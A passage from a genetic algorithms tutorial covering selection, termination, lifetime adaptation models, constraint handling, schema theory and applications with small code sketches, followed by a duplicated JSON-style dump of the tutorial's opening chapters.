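      System.out.println(Arrays.toString(tour));
   }
}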
The Survivor Selection Policy determines which individuals are to be kicked out and which are to be kept in the next generation. It is crucial as it should ensure that the fitter individuals are not kicked out of the population, while at the same time diversity should be maintained in the population.
Some GAs employ Elitism. In simple terms, it means the current fittest member of the population is always propagated to the next generation. Therefore, under no circumstance can the fittest member of the current population be replaced.
The easiest policy is to kick random members out of the population, but such an approach frequently has convergence issues, therefore the following strategies are widely used.
In Age-Based Selection, we don’t have a notion of fitness. It is based on the premise that each individual is allowed in the population for a finite number of generations where it is allowed to reproduce; after that, it is kicked out of the population no matter how good its fitness is.
For instance, suppose the age is the number of generations for which the individual has been in the population. The oldest members of the population, i.e. P4 and P7, are kicked out of the population and the ages of the rest of the members are incremented by one.
In fitness based selection, the children tend to replace the least fit individuals in the population. The selection of the least fit individuals may be done using a variation of any of the selection policies described before – tournament selection, fitness proportionate selection, etc.
For example, the children may replace the least fit individuals P1 and P10 of the population. It is to be noted that since P1 and P9 have the same fitness value, the decision to remove which individual from the population is arbitrary.
The termination condition of a Genetic Algorithm is important in determining when a GA run will end. It has been observed that initially, the GA progresses very fast with better solutions coming in every few iterations, but this tends to saturate in the later stages where the improvements are very small. We usually want a termination condition such that our solution is close to the optimal, at the end of the run.
Usually, we keep one of the following termination conditions −
When there has been no improvement in the population for X iterations.
When we reach an absolute number of generations.
When the objective function value has reached a certain pre-defined value.
For example, in a genetic algorithm we keep a counter which keeps track of the generations for which there has been no improvement in the population. Initially, we set this counter to zero. Each time we don’t generate off-springs which are better than the individuals in the population, we increment the counter. However, if the fitness of any of the off-springs is better, then we reset the counter to zero. The algorithm terminates when the counter reaches a predetermined value (a small code sketch of this counter follows below).
Like other parameters of a GA, the termination condition is also highly problem specific and the GA designer should try out various options to see what suits his particular problem the best.
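The counter based termination condition described in the example above can be kept in a small helper class like the following; the class name and the threshold value are illustrative assumptions.
public class NoImprovementTermination {

   private final int maxStagnantGenerations; // the predetermined value X
   private int stagnantGenerations = 0;      // generations without improvement
   private double bestFitnessSoFar = Double.NEGATIVE_INFINITY;

   public NoImprovementTermination(int maxStagnantGenerations) {
      this.maxStagnantGenerations = maxStagnantGenerations;
   }

   // Called once per generation with the best fitness found in that generation.
   // Returns true when the GA should stop.
   public boolean shouldTerminate(double bestFitnessThisGeneration) {
      if (bestFitnessThisGeneration > bestFitnessSoFar) {
         bestFitnessSoFar = bestFitnessThisGeneration;
         stagnantGenerations = 0;             // improvement found, reset the counter
      } else {
         stagnantGenerations++;               // no improvement, increment the counter
      }
      return stagnantGenerations >= maxStagnantGenerations;
   }

   public static void main(String[] args) {
      NoImprovementTermination termination = new NoImprovementTermination(3);
      double[] bestPerGeneration = {1.0, 2.0, 2.0, 2.5, 2.5, 2.5, 2.5};
      for (int generation = 0; generation < bestPerGeneration.length; generation++) {
         if (termination.shouldTerminate(bestPerGeneration[generation])) {
            System.out.println("Stopping after generation " + generation);
            break;
         }
      }
   }
}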
Till now in this tutorial, whatever we have discussed corresponds to the Darwinian model of evolution – natural selection and genetic variation through recombination and mutation. In nature, only the information contained in the individual’s genotype can be transmitted to the next generation. This is the approach which we have been following in the tutorial so far.
However, other models of lifetime adaptation – the Lamarckian Model and the Baldwinian Model – also exist. It is to be noted that the question of which model is the best is open for debate, and the results obtained by researchers show that the choice of lifetime adaptation is highly problem specific.
Often, we hybridize a GA with local search – like in Memetic Algorithms. In such cases, one might choose to go with either the Lamarckian or the Baldwinian Model to decide what to do with individuals generated after the local search.
The Lamarckian Model essentially says that the traits which an individual acquires in his/her lifetime can be passed on to its offspring. It is named after the French biologist Jean-Baptiste Lamarck.
Even though natural biology has completely disregarded Lamarckism, as we all know that only the information in the genotype can be transmitted, from a computational view point it has been shown that adopting the Lamarckian model gives good results for some of the problems.
In the Lamarckian model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it becomes the offspring.
The Baldwinian model is an intermediate idea named after James Mark Baldwin (1896). In the Baldwin model, the chromosomes can encode a tendency of learning beneficial behaviors. This means that, unlike the Lamarckian model, we don’t transmit the acquired traits to the next generation, and neither do we completely ignore the acquired traits like in the Darwinian Model.
The Baldwin Model is in the middle of these two extremes, wherein the tendency of an individual to acquire certain traits is encoded rather than the traits themselves.
In the Baldwinian Model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it only assigns the improved fitness to the chromosome and does not modify the chromosome itself. The change in fitness signifies the chromosome’s capability to “acquire the trait”, even though it is not passed directly to the future generations.
GAs are very general in nature, and just applying them to any optimization problem wouldn’t give good results. In this section, we describe a few points which would help and assist a GA designer or GA implementer in their work.
It has been observed that the more problem-specific domain knowledge we incorporate into the GA, the better objective values we get. Adding problem specific information can be done by either using problem specific crossover or mutation operators, custom representations, etc. Michalewicz (1990) presents a view of the EA along these lines.
Crowding happens when a highly fit chromosome gets to reproduce a lot, and in a few generations, the entire population is filled with similar solutions having similar fitness. This reduces diversity which is a very crucial element to ensure the success of a GA. There are numerous ways to limit crowding. Some of them are −
Mutation to introduce diversity.
Switching to rank selection and tournament selection which have more selection pressure than fitness proportionate selection for individuals with similar fitness.
Fitness Sharing − In this an individual’s fitness is reduced if the population already contains similar individuals.
It has been experimentally observed that the best solutions are driven by randomized chromosomes as they impart diversity to the population. The GA implementer should be careful to keep a sufficient amount of randomization and diversity in the population for the best results.
Local search refers to checking the solutions in the neighborhood of a given solution to look for better objective values. It may be sometimes useful to hybridize the GA with local search, which can be introduced at various places in the GA loop.
In genetic algorithms, there is no “one size fits all” or a magic formula which works for all problems.
Even after the initial GA is ready, it takes a lot of time and effort to play around with parameters like the population size, mutation and crossover probability, etc. to find the ones which suit the particular problem.
In this section, we introduce some advanced topics in Genetic Algorithms. A reader looking for just an introduction to GAs may choose to skip this section.
Constrained Optimization Problems are those optimization problems in which we have to maximize or minimize a given objective function value subject to certain constraints. Therefore, not all results in the solution space are feasible, and the solution space contains feasible regions.
In such a scenario, crossover and mutation operators might give us solutions which are infeasible. Therefore, additional mechanisms have to be employed in the GA when dealing with constrained Optimization Problems. Some of the most common methods are (a small sketch of the first of these, a penalty based fitness, follows this list) −
Using penalty functions which reduce the fitness of infeasible solutions, preferably so that the fitness is reduced in proportion with the number of constraints violated or the distance from the feasible region.
Using repair functions which take an infeasible solution and modify it so that the violated constraints get satisfied.
Not allowing infeasible solutions to enter into the population at all.
Using a special representation or decoder functions that ensure the feasibility of the solutions.
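As an illustration of the first method, the sketch below applies a penalty function to the 0/1 Knapsack: instead of discarding an overweight solution, its fitness is reduced in proportion to the distance from the feasible region. The penalty coefficient is an assumed, problem specific value, and the class name is illustrative.
public class PenalizedKnapsackFitness {

   // Fitness with a penalty term: total profit minus a penalty that grows
   // with the amount by which the knapsack capacity is exceeded.
   public static double fitness(int[] genes, int[] profits, int[] weights,
                                int capacity, double penaltyCoefficient) {
      int totalProfit = 0;
      int totalWeight = 0;
      for (int i = 0; i < genes.length; i++) {
         if (genes[i] == 1) {
            totalProfit += profits[i];
            totalWeight += weights[i];
         }
      }
      int overweight = Math.max(0, totalWeight - capacity); // distance from the feasible region
      return totalProfit - penaltyCoefficient * overweight;
   }

   public static void main(String[] args) {
      int[] profits = {60, 100, 120};
      int[] weights = {10, 20, 30};
      int capacity = 50;
      double penaltyCoefficient = 10.0; // illustrative value, tuned per problem

      // Feasible solution: items 1 and 2 (weight 50) - no penalty.
      System.out.println(fitness(new int[]{0, 1, 1}, profits, weights, capacity, penaltyCoefficient));
      // Infeasible solution: all items (weight 60) - penalised but not discarded.
      System.out.println(fitness(new int[]{1, 1, 1}, profits, weights, capacity, penaltyCoefficient));
   }
}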
In this section, we will discuss the Schema and NFL theorems along with the building block hypothesis.
Researchers have been trying to figure out the mathematics behind the working of genetic algorithms, and Holland’s Schema Theorem is a step in that direction. Over the years, various improvements and suggestions have been made to the Schema Theorem to make it more general.
In this section, we don’t delve into the mathematics of the Schema Theorem, rather we try to develop a basic understanding of what the Schema Theorem is. The basic terminology to know is as follows −
A Schema is a “template”. Formally, it is a string over the alphabet = {0,1,*}, where * is don’t care and can take any value. Therefore, *10*1 could mean 01001, 01011, 11001, or 11011. Geometrically, a schema is a hyper-plane in the solution search space.
Order of a schema is the number of specified (fixed) positions in the schema.
Defining length is the distance between the two furthest fixed symbols in the schema.
The schema theorem states that schemata with above average fitness, short defining length and lower order are more likely to survive crossover and mutation.
Building Blocks are low order, low defining length schemata with above average fitness. The building block hypothesis says that such building blocks serve as a foundation for the GA’s success and adaptation, as the GA progresses by successively identifying and recombining such “building blocks”.
Wolpert and Macready in 1997 published a paper titled “No Free Lunch Theorems for Optimization.” It essentially states that if we average over the space of all possible problems, then all non-revisiting black box algorithms will exhibit the same performance.
It means that the more we understand a problem, the more problem specific our GA becomes and the better it performs, but it makes up for that by performing poorly for other problems.
Genetic Algorithms also find application in Machine Learning. Classifier systems are a form of genetics-based machine learning (GBML) system that are frequently used in the field of machine learning. GBML methods are a niche approach to machine learning.
There are two categories of GBML systems −
The Pittsburgh Approach − In this approach, one chromosome encodes one solution, and so fitness is assigned to solutions.
The Michigan Approach − One solution is typically represented by many chromosomes and so fitness is assigned to partial solutions.
It should be kept in mind that the standard issues like crossover, mutation, Lamarckian or Darwinian, etc. are also present in the GBML systems.
Genetic Algorithms are primarily used in optimization problems of various kinds, but they are frequently used in other application areas as well. In this section, we list some of the areas in which Genetic Algorithms are frequently used. These are −
Optimization − Genetic Algorithms are most commonly used in optimization problems wherein we have to maximize or minimize a given objective function value under a given set of constraints. The approach to solve optimization problems has been highlighted throughout the tutorial.
Economics − GAs are also used to characterize various economic models like the cobweb model, game theory equilibrium resolution, asset pricing, etc.
Neural Networks − GAs are also used to train neural networks, particularly recurrent neural networks.
Parallelization − GAs also have very good parallel capabilities, and prove to be very effective means in solving certain problems, and also provide a good area for research.
Image Processing − GAs are used for various digital image processing (DIP) tasks as well, like dense pixel matching.
Vehicle routing problems − With multiple soft time windows, multiple depots and a heterogeneous fleet.
Scheduling applications − GAs are used to solve various scheduling problems as well, particularly the time tabling problem.
Machine Learning − As already discussed, genetics based machine learning (GBML) is a niche area in machine learning.
Robot Trajectory Generation − GAs have been used to plan the path which a robot arm takes by moving from one point to another.
Parametric Design of Aircraft − GAs have been used to design aircraft by varying the parameters and evolving better solutions.
DNA Analysis − GAs have been used to determine the structure of DNA using spectrometric data about the sample.
Multimodal Optimization − GAs are obviously very good approaches for multimodal optimization in which we have to find multiple optimum solutions.
Traveling salesman problem and its applications − GAs have been used to solve the TSP, which is a well-known combinatorial problem, using novel crossover and packing strategies.
The following books can be referred to further enhance the reader’s knowledge of Genetic Algorithms, and Evolutionary Computation in general −
Genetic Algorithms in Search, Optimization and Machine Learning by David E. Goldberg.
Genetic Algorithms + Data Structures = Evolutionary Programs by Zbigniew Michalewicz.
Practical Genetic Algorithms by Randy L. Haupt and Sue Ellen Haupt.
Multi Objective Optimization using Evolutionary Algorithms by Kalyanmoy Deb.
[ { "code": null, "e": 2390, "s": 2041, "text": "Genetic Algorithm (GA) is a search-based optimization technique based on the principles of Genetics and Natural Selection. It is frequently used to find optimal or near-optimal solutions to difficult problems which otherwise would take a lifetime to solve. It is frequently used to solve optimization problems, in research, and in machine learning." }, { "code": null, "e": 2541, "s": 2390, "text": "Optimization is the process of making something better. In any process, we have a set of inputs and a set of outputs as shown in the following figure." }, { "code": null, "e": 2833, "s": 2541, "text": "Optimization refers to finding the values of inputs in such a way that we get the “best” output values. The definition of “best” varies from problem to problem, but in mathematical terms, it refers to maximizing or minimizing one or more objective functions, by varying the input parameters." }, { "code": null, "e": 3101, "s": 2833, "text": "The set of all possible solutions or values which the inputs can take make up the search space. In this search space, lies a point or a set of points which gives the optimal solution. The aim of optimization is to find that point or set of points in the search space." }, { "code": null, "e": 3371, "s": 3101, "text": "Nature has always been a great source of inspiration to all mankind. Genetic Algorithms (GAs) are search based algorithms based on the concepts of natural selection and genetics. GAs are a subset of a much larger branch of computation known as Evolutionary Computation." }, { "code": null, "e": 3589, "s": 3371, "text": "GAs were developed by John Holland and his students and colleagues at the University of Michigan, most notably David E. Goldberg and has since been tried on various optimization problems with a high degree of success." }, { "code": null, "e": 4112, "s": 3589, "text": "In GAs, we have a pool or a population of possible solutions to the given problem. These solutions then undergo recombination and mutation (like in natural genetics), producing new children, and the process is repeated over various generations. Each individual (or candidate solution) is assigned a fitness value (based on its objective function value) and the fitter individuals are given a higher chance to mate and yield more “fitter” individuals. This is in line with the Darwinian Theory of “Survival of the Fittest”." }, { "code": null, "e": 4229, "s": 4112, "text": "In this way we keep “evolving” better individuals or solutions over generations, till we reach a stopping criterion." }, { "code": null, "e": 4472, "s": 4229, "text": "Genetic Algorithms are sufficiently randomized in nature, but they perform much better than random local search (in which we just try various random solutions, keeping track of the best so far), as they exploit historical information as well." }, { "code": null, "e": 4556, "s": 4472, "text": "GAs have various advantages which have made them immensely popular. These include −" }, { "code": null, "e": 4659, "s": 4556, "text": "Does not require any derivative information (which may not be available for many real-world problems)." }, { "code": null, "e": 4762, "s": 4659, "text": "Does not require any derivative information (which may not be available for many real-world problems)." }, { "code": null, "e": 4831, "s": 4762, "text": "Is faster and more efficient as compared to the traditional methods." 
}, { "code": null, "e": 4900, "s": 4831, "text": "Is faster and more efficient as compared to the traditional methods." }, { "code": null, "e": 4937, "s": 4900, "text": "Has very good parallel capabilities." }, { "code": null, "e": 4974, "s": 4937, "text": "Has very good parallel capabilities." }, { "code": null, "e": 5058, "s": 4974, "text": "Optimizes both continuous and discrete functions and also multi-objective problems." }, { "code": null, "e": 5142, "s": 5058, "text": "Optimizes both continuous and discrete functions and also multi-objective problems." }, { "code": null, "e": 5210, "s": 5142, "text": "Provides a list of “good” solutions and not just a single solution." }, { "code": null, "e": 5278, "s": 5210, "text": "Provides a list of “good” solutions and not just a single solution." }, { "code": null, "e": 5349, "s": 5278, "text": "Always gets an answer to the problem, which gets better over the time." }, { "code": null, "e": 5420, "s": 5349, "text": "Always gets an answer to the problem, which gets better over the time." }, { "code": null, "e": 5516, "s": 5420, "text": "Useful when the search space is very large and there are a large number of parameters involved." }, { "code": null, "e": 5612, "s": 5516, "text": "Useful when the search space is very large and there are a large number of parameters involved." }, { "code": null, "e": 5688, "s": 5612, "text": "Like any technique, GAs also suffer from a few limitations. These include −" }, { "code": null, "e": 5813, "s": 5688, "text": "GAs are not suited for all problems, especially problems which are simple and for which derivative information is available." }, { "code": null, "e": 5938, "s": 5813, "text": "GAs are not suited for all problems, especially problems which are simple and for which derivative information is available." }, { "code": null, "e": 6037, "s": 5938, "text": "Fitness value is calculated repeatedly which might be computationally expensive for some problems." }, { "code": null, "e": 6136, "s": 6037, "text": "Fitness value is calculated repeatedly which might be computationally expensive for some problems." }, { "code": null, "e": 6228, "s": 6136, "text": "Being stochastic, there are no guarantees on the optimality or the quality of the solution." }, { "code": null, "e": 6320, "s": 6228, "text": "Being stochastic, there are no guarantees on the optimality or the quality of the solution." }, { "code": null, "e": 6398, "s": 6320, "text": "If not implemented properly, the GA may not converge to the optimal solution." }, { "code": null, "e": 6476, "s": 6398, "text": "If not implemented properly, the GA may not converge to the optimal solution." }, { "code": null, "e": 6694, "s": 6476, "text": "Genetic Algorithms have the ability to deliver a “good-enough” solution “fast-enough”. This makes genetic algorithms attractive for use in solving optimization problems. The reasons why GAs are needed are as follows −" }, { "code": null, "e": 7027, "s": 6694, "text": "In computer science, there is a large set of problems, which are NP-Hard. What this essentially means is that, even the most powerful computing systems take a very long time (even years!) to solve that problem. In such a scenario, GAs prove to be an efficient tool to provide usable near-optimal solutions in a short amount of time." }, { "code": null, "e": 7594, "s": 7027, "text": "Traditional calculus based methods work by starting at a random point and by moving in the direction of the gradient, till we reach the top of the hill. 
This technique is efficient and works very well for single-peaked objective functions like the cost function in linear regression. But, in most real-world situations, we have a very complex problem called as landscapes, which are made of many peaks and many valleys, which causes such methods to fail, as they suffer from an inherent tendency of getting stuck at the local optima as shown in the following figure." }, { "code": null, "e": 8042, "s": 7594, "text": "Some difficult problems like the Travelling Salesperson Problem (TSP), have real-world applications like path finding and VLSI Design. Now imagine that you are using your GPS Navigation system, and it takes a few minutes (or even a few hours) to compute the “optimal” path from the source to destination. Delay in such real world applications is not acceptable and therefore a “good-enough” solution, which is delivered “fast” is what is required." }, { "code": null, "e": 8368, "s": 8042, "text": "This section introduces the basic terminology required to understand GAs. Also, a generic structure of GAs is presented in both pseudo-code and graphical forms. The reader is advised to properly understand all the concepts introduced in this section and keep them in mind when reading other sections of this tutorial as well." }, { "code": null, "e": 8525, "s": 8368, "text": "Before beginning a discussion on Genetic Algorithms, it is essential to be familiar with some basic terminology which will be used throughout this tutorial." }, { "code": null, "e": 8779, "s": 8525, "text": "Population − It is a subset of all the possible (encoded) solutions to the given problem. The population for a GA is analogous to the population for human beings except that instead of human beings, we have Candidate Solutions representing human beings." }, { "code": null, "e": 9033, "s": 8779, "text": "Population − It is a subset of all the possible (encoded) solutions to the given problem. The population for a GA is analogous to the population for human beings except that instead of human beings, we have Candidate Solutions representing human beings." }, { "code": null, "e": 9103, "s": 9033, "text": "Chromosomes − A chromosome is one such solution to the given problem." }, { "code": null, "e": 9173, "s": 9103, "text": "Chromosomes − A chromosome is one such solution to the given problem." }, { "code": null, "e": 9228, "s": 9173, "text": "Gene − A gene is one element position of a chromosome." }, { "code": null, "e": 9283, "s": 9228, "text": "Gene − A gene is one element position of a chromosome." }, { "code": null, "e": 9350, "s": 9283, "text": "Allele − It is the value a gene takes for a particular chromosome." }, { "code": null, "e": 9417, "s": 9350, "text": "Allele − It is the value a gene takes for a particular chromosome." }, { "code": null, "e": 9619, "s": 9417, "text": "Genotype − Genotype is the population in the computation space. In the computation space, the solutions are represented in a way which can be easily understood and manipulated using a computing system." }, { "code": null, "e": 9821, "s": 9619, "text": "Genotype − Genotype is the population in the computation space. In the computation space, the solutions are represented in a way which can be easily understood and manipulated using a computing system." }, { "code": null, "e": 9992, "s": 9821, "text": "Phenotype − Phenotype is the population in the actual real world solution space in which solutions are represented in a way they are represented in real world situations." 
}, { "code": null, "e": 10163, "s": 9992, "text": "Phenotype − Phenotype is the population in the actual real world solution space in which solutions are represented in a way they are represented in real world situations." }, { "code": null, "e": 11036, "s": 10163, "text": "Decoding and Encoding − For simple problems, the phenotype and genotype spaces are the same. However, in most of the cases, the phenotype and genotype spaces are different. Decoding is a process of transforming a solution from the genotype to the phenotype space, while encoding is a process of transforming from the phenotype to genotype space. Decoding should be fast as it is carried out repeatedly in a GA during the fitness value calculation.\nFor example, consider the 0/1 Knapsack Problem. The Phenotype space consists of solutions which just contain the item numbers of the items to be picked.\nHowever, in the genotype space it can be represented as a binary string of length n (where n is the number of items). A 0 at position x represents that xth item is picked while a 1 represents the reverse. This is a case where genotype and phenotype spaces are different.\n" }, { "code": null, "e": 11484, "s": 11036, "text": "Decoding and Encoding − For simple problems, the phenotype and genotype spaces are the same. However, in most of the cases, the phenotype and genotype spaces are different. Decoding is a process of transforming a solution from the genotype to the phenotype space, while encoding is a process of transforming from the phenotype to genotype space. Decoding should be fast as it is carried out repeatedly in a GA during the fitness value calculation." }, { "code": null, "e": 11637, "s": 11484, "text": "For example, consider the 0/1 Knapsack Problem. The Phenotype space consists of solutions which just contain the item numbers of the items to be picked." }, { "code": null, "e": 11908, "s": 11637, "text": "However, in the genotype space it can be represented as a binary string of length n (where n is the number of items). A 0 at position x represents that xth item is picked while a 1 represents the reverse. This is a case where genotype and phenotype spaces are different." }, { "code": null, "e": 12209, "s": 11908, "text": "Fitness Function − A fitness function simply defined is a function which takes the solution as input and produces the suitability of the solution as the output. In some cases, the fitness function and the objective function may be the same, while in others it might be different based on the problem." }, { "code": null, "e": 12510, "s": 12209, "text": "Fitness Function − A fitness function simply defined is a function which takes the solution as input and produces the suitability of the solution as the output. In some cases, the fitness function and the objective function may be the same, while in others it might be different based on the problem." }, { "code": null, "e": 12635, "s": 12510, "text": "Genetic Operators − These alter the genetic composition of the offspring. These include crossover, mutation, selection, etc." }, { "code": null, "e": 12760, "s": 12635, "text": "Genetic Operators − These alter the genetic composition of the offspring. These include crossover, mutation, selection, etc." }, { "code": null, "e": 12804, "s": 12760, "text": "The basic structure of a GA is as follows −" }, { "code": null, "e": 13232, "s": 12804, "text": "We start with an initial population (which may be generated at random or seeded by other heuristics), select parents from this population for mating. 
The basic structure of a GA is as follows −

We start with an initial population (which may be generated at random or seeded by other heuristics) and select parents from this population for mating. We then apply crossover and mutation operators on the parents to generate new off-springs. Finally, these off-springs replace the existing individuals in the population and the process repeats. In this way, genetic algorithms actually try to mimic human evolution to some extent.

Each of the following steps is covered as a separate chapter later in this tutorial.

A generalized pseudo-code for a GA is explained in the following program −

GA()
   initialize population
   find fitness of population
   
   while (termination criteria not reached) do
      parent selection
      crossover with probability pc
      mutation with probability pm
      decode and fitness calculation
      survivor selection
      find best
   return best
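The same flow can be sketched in Python. This is a schematic written for this tutorial: the problem-specific helpers (initialize_population, fitness, select_parents, crossover, mutate, survivor_selection) are assumed to be supplied by the user, and only the control flow mirrors the pseudo-code above.

import random

def run_ga(initialize_population, fitness, select_parents, crossover, mutate,
           survivor_selection, pc=0.9, pm=0.1, max_generations=100):
    # initialize population and compute its fitness
    population = initialize_population()
    scores = [fitness(ind) for ind in population]
    for generation in range(max_generations):   # termination criterion: generation budget
        parents = select_parents(population, scores)
        offspring = []
        for p1, p2 in zip(parents[::2], parents[1::2]):
            # crossover with probability pc, otherwise copy the parents
            c1, c2 = crossover(p1, p2) if random.random() < pc else (p1[:], p2[:])
            # mutation with probability pm
            offspring.append(mutate(c1) if random.random() < pm else c1)
            offspring.append(mutate(c2) if random.random() < pm else c2)
        # decode and fitness calculation, then survivor selection
        offspring_scores = [fitness(ind) for ind in offspring]
        population, scores = survivor_selection(population, scores,
                                                offspring, offspring_scores)
    # find best
    best = max(range(len(population)), key=lambda i: scores[i])
    return population[best], scores[best]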
One of the most important decisions to make while implementing a genetic algorithm is deciding the representation that we will use to represent our solutions. It has been observed that an improper representation can lead to poor performance of the GA. Therefore, choosing a proper representation, with a proper definition of the mappings between the phenotype and genotype spaces, is essential for the success of a GA.

In this section, we present some of the most commonly used representations for genetic algorithms. However, representation is highly problem specific and the reader might find that another representation, or a mix of the representations mentioned here, might suit his/her problem better.

Binary representation is one of the simplest and most widely used representations in GAs. In this type of representation the genotype consists of bit strings. For some problems, when the solution space consists of Boolean decision variables – yes or no – the binary representation is natural. Take for example the 0/1 Knapsack Problem. If there are n items, we can represent a solution by a binary string of n elements, where the xth element tells whether item x is picked (1) or not (0).

For other problems, specifically those dealing with numbers, we can represent the numbers with their binary representation. The problem with this kind of encoding is that different bits have different significance and therefore mutation and crossover operators can have undesired consequences. This can be resolved to some extent by using Gray Coding, as a change in one bit does not have a massive effect on the solution.

For problems where we want to define the genes using continuous rather than discrete variables, the real valued representation is the most natural. The precision of these real valued or floating point numbers is, however, limited by the computer.

For discrete valued genes, we cannot always limit the solution space to a binary ‘yes’ or ‘no’. For example, if we want to encode the four directions – North, South, East and West – we can encode them as {0,1,2,3}. In such cases, integer representation is desirable.

In many problems, the solution is represented by an ordering of elements. In such cases, permutation representation is the most suited. A classic example of this representation is the travelling salesman problem (TSP). Here the salesman has to take a tour of all the cities, visiting each city exactly once, and come back to the starting city. The total distance of the tour has to be minimized. The solution to this TSP is naturally an ordering or permutation of all the cities, and therefore using a permutation representation makes sense for this problem.

Population is a subset of solutions in the current generation. It can also be defined as a set of chromosomes. There are several things to be kept in mind when dealing with a GA population −

The diversity of the population should be maintained, otherwise it might lead to premature convergence.

The population size should not be kept very large as it can cause the GA to slow down, while a smaller population might not be enough for a good mating pool. Therefore, an optimal population size needs to be decided by trial and error.

The population is usually defined as a two-dimensional array of size population size x chromosome size.

There are two primary methods to initialize a population in a GA. They are −

Random Initialization − Populate the initial population with completely random solutions.

Heuristic Initialization − Populate the initial population using a known heuristic for the problem.

It has been observed that the entire population should not be initialized using a heuristic, as it can result in the population having similar solutions and very little diversity. It has been experimentally observed that random solutions are the ones that drive the population to optimality. Therefore, with heuristic initialization, we just seed the population with a couple of good solutions, filling up the rest with random solutions rather than filling the entire population with heuristic-based solutions.

It has also been observed that heuristic initialization, in some cases, only affects the initial fitness of the population, but in the end, it is the diversity of the solutions which leads to optimality.
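Both initialization strategies can be sketched in a few lines for a binary-encoded problem. This is illustrative code written for this tutorial; the heuristic solution passed in for seeding is a hypothetical placeholder that would come from a problem-specific heuristic.

import random

def random_initialization(pop_size, chrom_size):
    # completely random 0/1 chromosomes
    return [[random.randint(0, 1) for _ in range(chrom_size)] for _ in range(pop_size)]

def heuristic_initialization(pop_size, chrom_size, heuristic_solution, n_seeds=2):
    # seed only a couple of good solutions and fill the rest randomly to keep diversity
    population = [heuristic_solution[:] for _ in range(n_seeds)]
    population += random_initialization(pop_size - n_seeds, chrom_size)
    return population

population = heuristic_initialization(10, 8, heuristic_solution=[1, 0, 1, 1, 0, 0, 1, 0])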
}, { "code": null, "e": 18545, "s": 18497, "text": "There are two population models widely in use −" }, { "code": null, "e": 18730, "s": 18545, "text": "In steady state GA, we generate one or two off-springs in each iteration and they replace one or two individuals from the population. A steady state GA is also known as Incremental GA." }, { "code": null, "e": 18898, "s": 18730, "text": "In a generational model, we generate ‘n’ off-springs, where n is the population size, and the entire population is replaced by the new one at the end of the iteration." }, { "code": null, "e": 19115, "s": 18898, "text": "The fitness function simply defined is a function which takes a candidate solution to the problem as input and produces as output how “fit” our how “good” the solution is with respect to the problem in consideration." }, { "code": null, "e": 19315, "s": 19115, "text": "Calculation of fitness value is done repeatedly in a GA and therefore it should be sufficiently fast. A slow computation of the fitness value can adversely affect a GA and make it exceptionally slow." }, { "code": null, "e": 19621, "s": 19315, "text": "In most cases the fitness function and the objective function are the same as the objective is to either maximize or minimize the given objective function. However, for more complex problems with multiple objectives and constraints, an Algorithm Designer might choose to have a different fitness function." }, { "code": null, "e": 19687, "s": 19621, "text": "A fitness function should possess the following characteristics −" }, { "code": null, "e": 19748, "s": 19687, "text": "The fitness function should be sufficiently fast to compute." }, { "code": null, "e": 19809, "s": 19748, "text": "The fitness function should be sufficiently fast to compute." }, { "code": null, "e": 19932, "s": 19809, "text": "It must quantitatively measure how fit a given solution is or how fit individuals can be produced from the given solution." }, { "code": null, "e": 20055, "s": 19932, "text": "It must quantitatively measure how fit a given solution is or how fit individuals can be produced from the given solution." }, { "code": null, "e": 20253, "s": 20055, "text": "In some cases, calculating the fitness function directly might not be possible due to the inherent complexities of the problem at hand. In such cases, we do fitness approximation to suit our needs." }, { "code": null, "e": 20517, "s": 20253, "text": "The following image shows the fitness calculation for a solution of the 0/1 Knapsack. It is a simple fitness function which just sums the profit values of the items being picked (which have a 1), scanning the elements from left to right till the knapsack is full." }, { "code": null, "e": 20777, "s": 20517, "text": "Parent Selection is the process of selecting parents which mate and recombine to create off-springs for the next generation. Parent selection is very crucial to the convergence rate of the GA as good parents drive individuals to a better and fitter solutions." }, { "code": null, "e": 21262, "s": 20777, "text": "However, care should be taken to prevent one extremely fit solution from taking over the entire population in a few generations, as this leads to the solutions being close to one another in the solution space thereby leading to a loss of diversity. Maintaining good diversity in the population is extremely crucial for the success of a GA. 
Parent selection is the process of selecting parents which mate and recombine to create off-springs for the next generation. Parent selection is very crucial to the convergence rate of the GA, as good parents drive individuals towards better and fitter solutions.

However, care should be taken to prevent one extremely fit solution from taking over the entire population in a few generations, as this leads to the solutions being close to one another in the solution space, thereby leading to a loss of diversity. Maintaining good diversity in the population is extremely crucial for the success of a GA. This taking over of the entire population by one extremely fit solution is known as premature convergence and is an undesirable condition in a GA.

Fitness Proportionate Selection is one of the most popular ways of parent selection. In this, every individual can become a parent with a probability which is proportional to its fitness. Therefore, fitter individuals have a higher chance of mating and propagating their features to the next generation. Such a selection strategy applies a selection pressure towards the more fit individuals in the population, evolving better individuals over time.

Consider a circular wheel. The wheel is divided into n pies, where n is the number of individuals in the population. Each individual gets a portion of the circle which is proportional to its fitness value.

Two implementations of fitness proportionate selection are possible −

In roulette wheel selection, the circular wheel is divided as described before. A fixed point is chosen on the wheel circumference as shown and the wheel is rotated. The region of the wheel which comes in front of the fixed point is chosen as the parent. For the second parent, the same process is repeated.

It is clear that a fitter individual has a greater pie on the wheel and therefore a greater chance of landing in front of the fixed point when the wheel is rotated. Therefore, the probability of choosing an individual depends directly on its fitness.

Implementation wise, we use the following steps (a minimal sketch follows the steps) −

Calculate S = the sum of all the fitnesses.

Generate a random number r between 0 and S.

Starting from the top of the population, keep adding the fitnesses to the partial sum P, as long as P < r.

The individual for which P first reaches or exceeds r is the chosen individual.
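These steps translate directly into code. The sketch below is written for this tutorial and assumes non-negative fitness values; as noted next, fitness proportionate methods do not work when the fitness can be negative.

import random

def roulette_wheel_select(population, fitnesses):
    # S = sum of all fitnesses; spinning the wheel is drawing a random r in [0, S]
    S = sum(fitnesses)
    r = random.uniform(0, S)
    partial = 0
    for individual, fit in zip(population, fitnesses):
        partial += fit
        if partial >= r:            # the individual whose slice contains r is chosen
            return individual
    return population[-1]           # guard against floating-point round-off

pop = ["A", "B", "C"]
fits = [1.0, 3.0, 6.0]              # "C" owns 60% of the wheel
parents = [roulette_wheel_select(pop, fits) for _ in range(2)]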
Stochastic Universal Sampling is quite similar to roulette wheel selection; however, instead of having just one fixed point, we have multiple fixed points as shown in the following image. Therefore, all the parents are chosen in just one spin of the wheel. Also, such a setup encourages the highly fit individuals to be chosen at least once.

It is to be noted that fitness proportionate selection methods don’t work for cases where the fitness can take a negative value.

In K-Way tournament selection, we select K individuals from the population at random and select the best out of these to become a parent. The same process is repeated for selecting the next parent. Tournament selection is also extremely popular in the literature as it can even work with negative fitness values.

